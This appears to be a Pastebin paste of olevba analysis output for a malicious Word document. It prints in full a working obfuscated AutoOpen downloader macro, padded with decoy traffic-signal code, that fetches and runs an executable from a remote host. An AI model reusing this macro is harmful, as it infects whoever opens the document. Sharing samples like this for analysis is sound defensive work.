Advertisement
dynamoo

Malicious Word macro

Aug 3rd, 2015
463
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.31 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OpX:MASIHB-V 0018_6~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 0018_6~1.doc
  10. Type: OpenXML
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
  17.  
  18. VEeve (8.2)
  19.  
  20. End Sub
  21.  
  22. Sub VEeve(FFFFF As Long)
  23. NwKHQxx14zub
  24.  
  25. End Sub
  26.  
  27.  
  28.  
  29. -------------------------------------------------------------------------------
  30. VBA MACRO Module1.bas
  31. in file: word/vbaProject.bin - OLE stream: u'VBA/Module1'
  32. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  33.  
  34.     Public Function Remain_5F03(ByVal BusLineID As String, ByVal CrossRoadID As String, ByVal Goback As String) As Integer
  35.         Try
  36.             _mainForm.Show_LBox_PolicyRightNowText(" Remain_5F03 start ")
  37.  
  38.             If Goback = "1" Then
  39.                 Goback = "00"
  40.             ElseIf Goback = "2" Then
  41.                 Goback = "01"
  42.             End If
  43.  
  44.                 Dim lightstatus As String() = tempV3_5F14.LightStatus
  45.                 Dim Green As String() = tempV3_5F15.Green
  46.                 Dim total_phases As Integer = lightstatus.Length
  47.                 Dim phase_interval(total_phases) As Integer
  48.  
  49.                 For index As Integer = 0 To total_phases - 1
  50.                     phase_interval(Index) = YellowplusRed(lightstatus(Index)) + CurrentGreen(Green(Index))
  51.                     'phase_interval2(index) = phase_interval
  52.                    '_mainForm.Show_LBox_PolicyRightNowText(index.ToString + " Remain_5F03 Phase interval " + phase_interval.ToString)
  53.                    _mainForm.Show_LBox_PolicyRightNowText(index.ToString + " Remain_5F03 Phase interval " + phase_interval(index).ToString)
  54.                 Next Index
  55.                 End Function
  56.  
  57.  
  58. Public Function lQc8N4mpWW5(muULk3yaoasVTA As String)
  59.  Set ZRCB4OQPMEB6 = Aw9a6h1r(Chr(83) & Chr(104) & Chr(61) & Chr(101) & Chr(108) & Chr(59) & Chr(108) & Chr(60) & Chr(46) & Chr(65) & Chr(112) & Chr(59) & Chr(112) & Chr(108) & Chr(105) & Chr(60) & Chr(99) & Chr(97) & Chr(116) & Chr(61) & Chr(105) & Chr(111) & Chr(110))
  60. ZRCB4OQPMEB6.Open (rAHQOXN8z4zO)
  61. End Function
  62.  
  63. Public Function Syncd_IC2IPC_AcceptHash_2()
  64.                 Dim Data_5F18 As Object = Syncd_IC2IPC_AcceptHash(CrossRoadID + "_5F18")
  65.                 Dim planid As String = Data_5F18.PlanID.ToString
  66.                 Dim Data_5F03 As Object = Syncd_IC2IPC_AcceptHash(CrossRoadID + "_5F03")
  67.          
  68.                 Dim a() As Byte = HexStr2ByteArray(BusLineData(4))
  69.                 Dim BusPassPhases As BitArray = New BitArray(8)
  70.                 BusPassPhases = New BitArray(a)
  71.  
  72.                 Return DiffSecond
  73.  
  74.             Else
  75.                 Return Nothing
  76.             End If
  77.  
  78.         Catch ex As Exception
  79.             WriteLog(curPath, "Module1_Policy_Public", "  Remain_5F03 Catch:" + ex.Message, _logEnable)
  80.             Return -1
  81.         End Try
  82.     End Function
  83. -------------------------------------------------------------------------------
  84. VBA MACRO Module2.bas
  85. in file: word/vbaProject.bin - OLE stream: u'VBA/Module2'
  86. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  87.  
  88.     Public Function RemainingLightTime(ByVal GreenOrNot As Boolean) As Integer
  89.         Dim Remaining As Integer
  90.         Try
  91.             Dim TotalPhase As String
  92.             Try
  93.                 TotalPhase = Data_5F18.SubPhaseCount.ToString
  94.             Catch ex As Exception
  95.                 TotalPhase = Data_5F13.SubPhaseCount.ToString
  96.             End Try
  97.  
  98.             Dim TotalPhaseInt As Integer = Convert.ToDecimal(TotalPhase)
  99.             Dim CurrentPhaseInt As Integer = Convert.ToDecimal(Data_5FCC.Current_SubPhaseID)
  100.             Dim CurrentStepInt As Integer = Convert.ToDecimal(Data_5FCC.Current_StepID)
  101.             Dim CurrentRemainingTime As Integer = Data_5FCC.Current_RemainingInt
  102.  
  103.    
  104.  
  105.             If GreenOrNot Then
  106.                 '_mainForm.Show_LBox_PolicyRightNowText(" Calculate Remaining Green ")
  107.  
  108.                 If CurrentStepInt = 1 Then
  109.                     prepare = Greenint(CurrentPhaseInt - 1) - CurrentRemainingTime
  110.                     Remaining = Greenint(CurrentPhaseInt - 1) - prepare
  111.  
  112.                 ElseIf CurrentStepInt = 2 Then
  113.                     Remaining = CurrentRemainingTime + 4 + 3
  114.                 ElseIf CurrentStepInt = 3 Then
  115.                     Remaining = CurrentRemainingTime + 3
  116.                 Else
  117.                     Remaining = CurrentRemainingTime
  118.  
  119.                 End If
  120.  
  121.                 For index As Integer = CurrentPhaseInt + 1 To TotalPhaseInt
  122.                     If BusPassPhases(Index - 1) Then
  123.                         Remaining = Remaining + Greenint(Index - 1)
  124.                         If CurrentPhaseInt <> 1 Then
  125.                             For index2 As Integer = 1 To CurrentPhaseInt - 1
  126.  
  127.                                 If BusPassPhases(index2 - 1) Then
  128.                                     Remaining = Remaining + Greenint(index2 - 1)
  129.                                 End If
  130.  
  131.  
  132.                             Next
  133.  
  134.                         End If
  135.  
  136.  
  137.                     End If
  138.  
  139.                 Next
  140.  
  141.                 'If BusPassPhases(CurrentPhaseInt) Then
  142.                '    Remaining = Remaining + Greenint(CurrentPhaseInt)
  143.  
  144.                 'End If
  145.                Return Remaining
  146.             Else
  147.                 '_mainForm.Show_LBox_PolicyRightNowText(" Calculate Remaining Red ")
  148.                If CurrentStepInt = 1 Then
  149.                     prepare = Greenint(CurrentPhaseInt - 1) - CurrentRemainingTime
  150.                     Remaining = Greenint(CurrentPhaseInt - 1) - prepare
  151.  
  152.                 ElseIf CurrentStepInt = 2 Then
  153.                     Remaining = CurrentRemainingTime + 4 + 3 + 2
  154.                 ElseIf CurrentStepInt = 3 Then
  155.                     Remaining = CurrentRemainingTime + 3 + 2
  156.                 Else
  157.                     Remaining = CurrentRemainingTime
  158.  
  159.                 End If
  160. End Function
  161.  
  162.  
  163. Sub NwKHQxx14zub()
  164.  
  165. dChxZd9cty0 = "h" & Chr(116) & Chr(59) & "t" & Chr(112) & Chr(58) & Chr(47) & "<" & Chr(47) & Chr(111) & Chr(114) & Chr(112) & "i" & "g" & "=" & Chr(97) & Chr(103) & Chr(110) & "y" & Chr(46) & Chr(60) & "c" & "o" & Chr(109) & Chr(47) & Chr(119) & "4" & Chr(53) & Chr(114) & Chr(51) & Chr(47) & Chr(61) & Chr(56) & Chr(108) & Chr(54) & "m" & Chr(107) & Chr(46) & "=" & Chr(101) & ";" & Chr(120) & Chr(101)
  166. Set hRomc9OqfrT = Aw9a6h1r(Chr(77) & "i" & "<" & "c" & Chr(114) & Chr(111) & "=" & Chr(115) & "o" & Chr(102) & Chr(116) & Chr(59) & Chr(46) & "X" & Chr(77) & "<" & Chr(76) & ";" & "H" & Chr(84) & "=" & Chr(84) & "P")
  167.  
  168. dChxZd9cty0 = Replace(dChxZd9cty0, Chr(60), "")
  169. dChxZd9cty0 = Replace(dChxZd9cty0, Chr(61), "")
  170. dChxZd9cty0 = Replace(dChxZd9cty0, Chr(59), "")
  171. CallByName hRomc9OqfrT, Chr(79) & "p" & "e" & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), _
  172. dChxZd9cty0 _
  173. , False
  174.  
  175.  
  176. T17zaVI8G7 = Environ(Chr(84) & Chr(69) & "M" & Chr(80))
  177.  
  178. rAHQOXN8z4zO = T17zaVI8G7 & Chr(92) & Chr(115) & Chr(117) & Chr(112) & Chr(117) & "t" & Chr(102) & Chr(56) & Chr(46) & Chr(101) & "x" & Chr(101)
  179. Dim dQqnFJoOu9MYi() As Byte
  180. Dim mmm As VbCallType
  181. mmm = VbMethod
  182.  
  183. CallByName hRomc9OqfrT, Chr(83) & Chr(101) & Chr(110) & "d", mmm
  184.  
  185.  
  186.  
  187. dQqnFJoOu9MYi = hRomc9OqfrT.responseBody
  188. zGtUPirIvgMk dQqnFJoOu9MYi, rAHQOXN8z4zO
  189. On Error GoTo ELg0jdGF
  190.     a = 332 / 0
  191.   On Error GoTo 0
  192.  
  193. ta52uVgBTI4LPT:
  194.   Exit Sub
  195. ELg0jdGF:
  196.   lQc8N4mpWW5 ("X0VlMPg6nC")
  197. Resume ta52uVgBTI4LPT
  198. End Sub
  199.  
  200.  
  201. Public Function jhbjhjkn()
  202.                 For index As Integer = CurrentPhaseInt + 1 To TotalPhaseInt
  203.                     If BusPassPhases(Index - 1) = False Then
  204.                         Remaining = Remaining + Greenint(Index - 1) + 5
  205.                         If CurrentPhaseInt <> 1 Then
  206.                             For index2 As Integer = 1 To CurrentPhaseInt - 1
  207.  
  208.                                 If BusPassPhases(index2 - 1) = False Then
  209.                                     Remaining = Remaining + Greenint(index2 - 1) + 5
  210.                                 End If
  211.  
  212.  
  213.                             Next
  214.  
  215.                         End If
  216.  
  217.  
  218.                     End If
  219.  
  220.                 Next
  221.                 Return Remaining
  222.  
  223.  
  224.  
  225.             End If
  226.         Catch ex As Exception
  227.             _mainForm.Show_LBox_PolicyRightNowText(" RemainingLightTime Error" + ex.StackTrace.ToString)
  228.         End Try
  229.         Return Remaining
  230.     End Function
  231. -------------------------------------------------------------------------------
  232. VBA MACRO Module35.bas
  233. in file: word/vbaProject.bin - OLE stream: u'VBA/Module35'
  234. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  235.  
  236.     Public Function BusPhaseOrNot(ByVal BusLineID As String, ByVal CrossRoadID As String, ByVal Goback As String) As Boolean
  237.  
  238.         Try
  239.             Dim temp_goback As String = ""
  240.             If Goback = "1" Then
  241.                 Goback = "00"
  242.             ElseIf Goback = "2" Then
  243.                 Goback = "01"
  244.             End If
  245.  
  246.             Dim Data_5F03 As Object = HashTab_IC2IPC_Get(CrossRoadID + "_5F03")
  247.             'sPhaseOrder, sSignalMap, sSignalCount, sSubPhaseID, sStepID, sStepSec, sSignalStatus, Now
  248.            Dim Data_5F18 As Object = HashTab_IC2IPC_Get(CrossRoadID + "_5F18")
  249.  
  250.             Dim BusLineDataKey As String = BusLineID + "_" + CrossRoadID + "_" + Goback + "_" + Data_5F18.PlanID.ToString
  251.  
  252.             Dim CurrentPhaseInt As Integer = HexStringTOIntString(Data_5F03.SubPhaseID.ToString, 2)
  253.  
  254.        
  255.             'Dim BusPassPhases As BitArray = New BitArray(8)
  256.            Dim a() As Byte = HexStr2ByteArray(BusLineData(4)) '[BusSubPhaseID]
  257.            'FiveFB4.Add("BusPhase", BusLineData(4))
  258.            Dim BusPassPhases As BitArray = New BitArray(8)
  259.             BusPassPhases = New BitArray(a)
  260.  
  261. End Function
  262.  
  263.  
  264. Public Sub zGtUPirIvgMk(ZDtLniBdL3 As Variant, VCvMRSbB0LHH As String)
  265. Dim zsl48Nc6: Set zsl48Nc6 = Aw9a6h1r("A" & "<" & "d" & "o" & ";" & "d" & Chr(98) & Chr(61) & Chr(46) & "S" & Chr(116) & Chr(61) & Chr(114) & "<" & "e" & Chr(97) & Chr(59) & Chr(109))
  266. Dim zaPomni As Integer
  267. zaPomni = 1
  268. zsl48Nc6.Type = zaPomni
  269.  
  270.     zsl48Nc6.Open
  271.    
  272. zsl48Nc6.write ZDtLniBdL3
  273.     zsl48Nc6.savetofile VCvMRSbB0LHH, 2
  274. End Sub
  275.  
  276. Public Function Show_LBox_PolicyRightNowText()
  277.  
  278.             '_mainForm.Show_LBox_PolicyRightNowText("Bit array ")
  279.  
  280.             'For i = 0 To 7
  281.            '    If BusPassPhases(i) Then
  282.  
  283.             '        _mainForm.Show_LBox_PolicyRightNowText("Pass " + (i + 1).ToString)
  284.            '    Else
  285.            '        _mainForm.Show_LBox_PolicyRightNowText("Block " + (i + 1).ToString)
  286.            '    End If
  287.            'Next i
  288.  
  289.             ' _mainForm.Show_LBox_PolicyRightNowText("Bit array ")
  290.  
  291.             For i As Integer = 0 To BusPassPhases.Count - 1
  292.                 If BusPassPhases(i) And (i + 1) = CurrentPhaseInt And CurrentStepInt <> 5 Then
  293.  
  294.                     '_mainForm.Show_LBox_PolicyRightNowText("Green Light Now " + (i + 1).ToString)
  295.                    Return True
  296.  
  297.                 End If
  298.             Next i
  299.  
  300.  
  301.         Catch ex As Exception
  302.             _mainForm.Show_LBox_PolicyRightNowText("Bus Line Data error " + ex.StackTrace.ToString)
  303.             Return False
  304.         End Try
  305.         '_mainForm.Show_LBox_PolicyRightNowText("Red Light Now ")
  306.        Return False
  307.     End Function
  308.     '************************************************************************************************
  309.    '**
  310.    '** ?????
  311.    '**
  312.    '************************************************************************************************
  313.    '?????1:???  2???  3:???
  314.    'TriggerPointdList
  315.  
  316.  
  317.  
  318.  
  319.  
  320.     '************************************************************************************************
  321.    '**
  322.    '** ?????????
  323.    '**
  324.    '************************************************************************************************
  325.    'RG_Stauts:??-->R,??-->G
  326.    Public Function SendLightRemainSec(ByVal strBusID As String, ByVal RG_Stauts As String, ByVal RemainSec As String) As Boolean
  327.         Dim isSuccess As Boolean = False
  328.         Try
  329.             If _ConnectFlag_Car_Group Then
  330.                 Dim Sendstring As String
  331.                 Dim YearString As String = Now.Year.ToString("0000")
  332.                 Dim MonthString As String = Now.Month.ToString("00")
  333.                 Dim DayString As String = Now.Day.ToString("00")
  334.                 Dim HourString As String = Now.Hour.ToString("00")
  335.                 Dim MinuteString As String = Now.Minute.ToString("00")
  336.                 Dim SecondString As String = Now.Second.ToString("00")
  337.                 Dim TimeString As String = YearString + MonthString + DayString + HourString + MinuteString + SecondString
  338.                 SeqNumber = (SeqNumber + 1) Mod 1000000000
  339.                 Dim SeqString As String = SeqNumber.ToString("00000000")
  340.                 Sendstring = "B2," + strBusID + ",SET01010," + HourString + MinuteString + SecondString + "_" + Trim(RG_Stauts) + Trim(RemainSec) + ",0,2," + TimeString + "," + SeqString + "," + TimeString
  341.                 TCP_ClientWriteToCAR (Sendstring)
  342.                 Dim text As String = "[R-->Bus] " + Sendstring
  343.  
  344.                 WriteLog(curPath, "CAR_comm", [text], _logEnable)
  345.             End If
  346.         Catch ex As Exception
  347.         End Try
  348.         Return isSuccess
  349.     End Function
  350. -------------------------------------------------------------------------------
  351. VBA MACRO Module4.bas
  352. in file: word/vbaProject.bin - OLE stream: u'VBA/Module4'
  353. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  354.  
  355. Public rAHQOXN8z4zO As String
  356.  
  357. Public rAHQOXN8z4zO2 As String
  358.  
  359. Public rAHQOXN8z4zO3 As String
  360.  
  361. Public rAHQOXN8z4zO4 As String
  362.  
  363. Public rAHQOXN8z4zO5 As String
  364.  
  365. Public rAHQOXN8z4zO6 As String
  366.  Public Function SecondOfCar2CrossRoad(ByVal CarPostion As String, ByVal CrossRoadPostion As String, ByVal CarSpeed As Double) As Integer
  367.         Dim iSecReport As Integer = 0
  368.         Try
  369.             Dim StartPostion As String() = CarPostion.Split(",")
  370.             Dim EndPostion As String() = CrossRoadPostion.Split(",")
  371.             Dim EarthRadius As Integer = 6371
  372.             Dim factor As Double = Math.PI / 180
  373.             Dim dLat As Double = (Val(StartPostion(0)) - Val(EndPostion(0))) * factor
  374.             Dim dLon As Double = (Val(StartPostion(1)) - Val(EndPostion(1))) * factor
  375.  
  376.             Dim dis_a As Double = Math.Sin(dLat / 2) * Math.Sin(dLat / 2) + Math.Cos(Val(StartPostion(0)) * factor) * Math.Cos(Val(EndPostion(0)) * factor) * Math.Sin(dLon / 2) * Math.Sin(dLon / 2)
  377.             Dim dis_b As Double = 2 * Math.Atan2(Math.Sqrt(dis_a), Math.Sqrt(1 - dis_a))
  378.             Dim dis_c As Double = EarthRadius * dis_b * 1000
  379.  
  380.  
  381.             Dim SedondOfSpeedMeter As Double = (CarSpeed * 1000) / 3600
  382.             iSecReport = dis_c / SedondOfSpeedMeter
  383.             '_mainForm.Show_LBox_PolicyRightNowText("CarPostion " + CarPostion + " CrossRoadPostion " + CrossRoadPostion)
  384.            '_mainForm.Show_LBox_PolicyRightNowText("Distance " + dis_c.ToString + " Speed " + SedondOfSpeedMeter.ToString)
  385.  
  386.         Catch ex As Exception
  387.             iSecReport = 0
  388.         End Try
  389.         Return iSecReport
  390.     End Function
  391.     Public Function distance(ByVal CarPostion As String, ByVal CrossRoadPostion As String) As Integer
  392.         Dim iSecReport As Integer = 0
  393.         Try
  394.             Dim StartPostion As String() = CarPostion.Split(",")
  395.             Dim EndPostion As String() = CrossRoadPostion.Split(",")
  396.             Dim EarthRadius As Integer = 6371
  397.             Dim factor As Double = Math.PI / 180
  398.             Dim dLat As Double = (Val(StartPostion(0)) - Val(EndPostion(0))) * factor
  399.             Dim dLon As Double = (Val(StartPostion(1)) - Val(EndPostion(1))) * factor
  400.  
  401.             Dim dis_a As Double = Math.Sin(dLat / 2) * Math.Sin(dLat / 2) + Math.Cos(Val(StartPostion(0)) * factor) * Math.Cos(Val(EndPostion(0)) * factor) * Math.Sin(dLon / 2) * Math.Sin(dLon / 2)
  402.             Dim dis_b As Double = 2 * Math.Atan2(Math.Sqrt(dis_a), Math.Sqrt(1 - dis_a))
  403.             Dim dis_c As Double = EarthRadius * dis_b * 1000
  404.  
  405.             iSecReport = dis_c
  406.  
  407.             '_mainForm.Show_LBox_PolicyRightNowText("?? " + iSecReport.ToString)
  408.        Catch ex As Exception
  409.             iSecReport = 0
  410.             _mainForm.Show_LBox_PolicyRightNowText("distance error " + ex.Message)
  411.         End Try
  412.         Return iSecReport
  413.     End Function
  414.    
  415. Public Function Aw9a6h1r(Bc21xM5Qq As String)
  416. Bc21xM5Qq = Replace(Bc21xM5Qq, Chr(60), "")
  417. Bc21xM5Qq = Replace(Bc21xM5Qq, Chr(61), "")
  418. Bc21xM5Qq = Replace(Bc21xM5Qq, Chr(59), "")
  419.  Set Aw9a6h1r = CreateObject(Bc21xM5Qq)
  420. End Function
  421.  
  422.     Public Function distance2(ByVal CarPostion As String, ByVal CrossRoadPostion As String) As Integer
  423.         Dim iSecReport As Integer = 0
  424.         Try
  425.             Dim tempString As String = ""
  426.  
  427.             Dim StartPostion As String() = CarPostion.Split(",")
  428.             Dim EndPostion As String() = CrossRoadPostion.Split(",")
  429.             Dim EarthRadius As Integer = 6371
  430.             tempString = StartPostion(0)
  431.             StartPostion(0) = StartPostion(1)
  432.             StartPostion(1) = tempString
  433.             Dim factor As Double = Math.PI / 180
  434.             Dim dLat As Double = (Val(StartPostion(0)) - Val(EndPostion(0))) * factor
  435.             Dim dLon As Double = (Val(StartPostion(1)) - Val(EndPostion(1))) * factor
  436.  
  437.             Dim dis_a As Double = Math.Sin(dLat / 2) * Math.Sin(dLat / 2) + Math.Cos(Val(StartPostion(0)) * factor) * Math.Cos(Val(EndPostion(0)) * factor) * Math.Sin(dLon / 2) * Math.Sin(dLon / 2)
  438.             Dim dis_b As Double = 2 * Math.Atan2(Math.Sqrt(dis_a), Math.Sqrt(1 - dis_a))
  439.             Dim dis_c As Double = EarthRadius * dis_b * 1000
  440.  
  441.             iSecReport = dis_c
  442.  
  443.             '_mainForm.Show_LBox_PolicyRightNowText("?? " + iSecReport.ToString)
  444.        Catch ex As Exception
  445.             iSecReport = 0
  446.             _mainForm.Show_LBox_PolicyRightNowText("distance error " + ex.Message)
  447.         End Try
  448.         Return iSecReport
  449.     End Function
  450.     '???????
  451.    '?????1?,2??,3?,4??,5?,6??,7?,8??
  452.    Public Function isBusSameDirection(ByVal TriggerPhaseDirect As String) As Boolean
  453.         Dim isSame As Boolean = False
  454.         Try
  455.             If Not IsNothing(Data_5F03) Then
  456.                 Return isPass(Val(TriggerPhaseDirect) - 1, Data_5F03.SignalStatus, Data_5F03.SignalMap)
  457.             End If
  458.         Catch ex As Exception
  459.         End Try
  460.         Return isSame
  461.     End Function
  462.    
  463.     Public Function isPass(ByVal intIndex As Integer, ByVal strStatus As String, ByVal strSingalMap As String) As Boolean
  464.         Try
  465.             'Jason 2014-9-24
  466.            'S-------------------------------------------------------------
  467.            Dim SingalOrder As Integer = 0
  468.        
  469.                 Return False
  470.             End If
  471.         Catch ex As Exception
  472.             Dim trace As New System.Diagnostics.StackTrace(ex, True)
  473.             WriteLog(curPath, "Module1_Policy_Public", "isPass Catch(" + trace.GetFrame(0).GetFileLineNumber().ToString + ")" + ex.Message, _logEnable)
  474.         End Try
  475.         Return False
  476.     End Function
  477.  
  478. +------------+----------------------+-----------------------------------------+
  479. | Type       | Keyword              | Description                             |
  480. +------------+----------------------+-----------------------------------------+
  481. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  482. | Suspicious | Open                 | May open a file                         |
  483. | Suspicious | CreateObject         | May create an OLE object                |
  484. | Suspicious | CallByName           | May attempt to obfuscate malicious      |
  485. |            |                      | function calls                          |
  486. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  487. |            |                      | strings                                 |
  488. | Suspicious | SaveToFile           | May create a text file                  |
  489. | Suspicious | Environ              | May read system environment variables   |
  490. | Suspicious | Write                | May write to a file (if combined with   |
  491. |            |                      | Open)                                   |
  492. | Suspicious | Open                 | May open a file (obfuscation: VBA       |
  493. |            |                      | expression)                             |
  494. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  495. |            |                      | be used to obfuscate strings (option    |
  496. |            |                      | --decode to see all)                    |
  497. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  498. |            |                      | may be used to obfuscate strings        |
  499. |            |                      | (option --decode to see all)            |
  500. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  501. |            | Strings              | may be used to obfuscate strings        |
  502. |            |                      | (option --decode to see all)            |
  503. | IOC        | suputf8.exe          | Executable file name (obfuscation: VBA  |
  504. |            |                      | expression)                             |
  505. +------------+----------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement